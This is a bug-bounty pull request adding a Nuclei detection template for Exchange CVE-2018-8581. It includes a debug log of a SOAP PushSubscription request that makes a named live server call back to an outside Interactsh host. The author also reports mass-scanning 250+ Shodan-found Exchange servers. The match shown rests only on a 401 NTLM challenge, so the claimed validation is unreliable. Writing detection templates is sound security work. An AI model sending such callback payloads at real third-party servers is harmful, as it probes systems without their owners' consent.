Added detection template for Microsoft Exchange Server Privilege Escalation (CVE-2018-8581)

Description

PR Information

This PR adds a Nuclei template for CVE-2018-8581, which is a high-severity elevation of privilege vulnerability in Microsoft Exchange Server. The template performs an active probe of the EWS PushSubscription endpoint to verify the vulnerability through an OAST (Interactsh) interaction.

Added CVE-2018-8581
References:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581

https://vulncheck.com/xdb/276c34c7f74f

Template validation [x] Validated with a host running a vulnerable version and/or configuration (True Positive)

[ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details The template has been mass-validated against 250+ live Exchange instances found via Shodan. The template correctly identifies the /ews/exchange.asmx endpoint and triggers the expected NTLM authentication challenge.

Shodan Query: cpe:“cpe:2.3🅰️microsoft:exchange_server”

Nuclei Debug Output (Validated on 92.117.167.184):

nuclei -t cve-2018-8581.yaml -u https://92.117.167.184 -debug -o debug_log.txt

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.4

                projectdiscovery.io

[INF] Current nuclei version: v3.4.4 (outdated)
[INF] Current nuclei-templates version: v10.3.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 176
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.fun
[INF] [CVE-2018-8581] Dumped HTTP request for https://92.117.167.184/ews/exchange.asmx

POST /ews/exchange.asmx HTTP/1.1
Host: 92.117.167.184
User-Agent: Nuclei - Open Source Project (https://github.com/projectdiscovery/nuclei)
Content-Length: 685
Accept: text/xml
Accept-Language: en
Connection: close
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2004/types"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2004/messages">
  <soap:Header>
    <t:RequestServerVersion Version="Exchange2010" />
  </soap:Header>
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest SubscribeToAllFolders="true">
        <t:URL>http://d5fng43q7lacfghsa2603mg9xozw7ckx5.oast.fun</t:URL>
        <t:StatusFrequency>1</t:StatusFrequency>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>
[DBG] [CVE-2018-8581] Dumped HTTP response https://92.117.167.184/ews/exchange.asmx

HTTP/1.1 401 Unauthorized
Connection: close
Content-Length: 0
Date: Thu, 08 Jan 2026 09:25:39 GMT
Request-Id: c72932dd-27e2-48d3-b4cd-648b63e6b978
Server: Microsoft-IIS/10.0
Www-Authenticate: Negotiate
Www-Authenticate: NTLM
X-Feserver: SRV03
X-Owa-Version: 15.2.1748.39
X-Powered-By: ASP.NET

[CVE-2018-8581:word-3] [http] [high] https://92.117.167.184/ews/exchange.asmx
[INF] Scan completed in 7.991135636s. 1 matches found.
hacker@hacker ~/Desktop/CVE %

Bounty Claim: /claim #14576 /attempt #14576

Claim

Contributors

Sponsors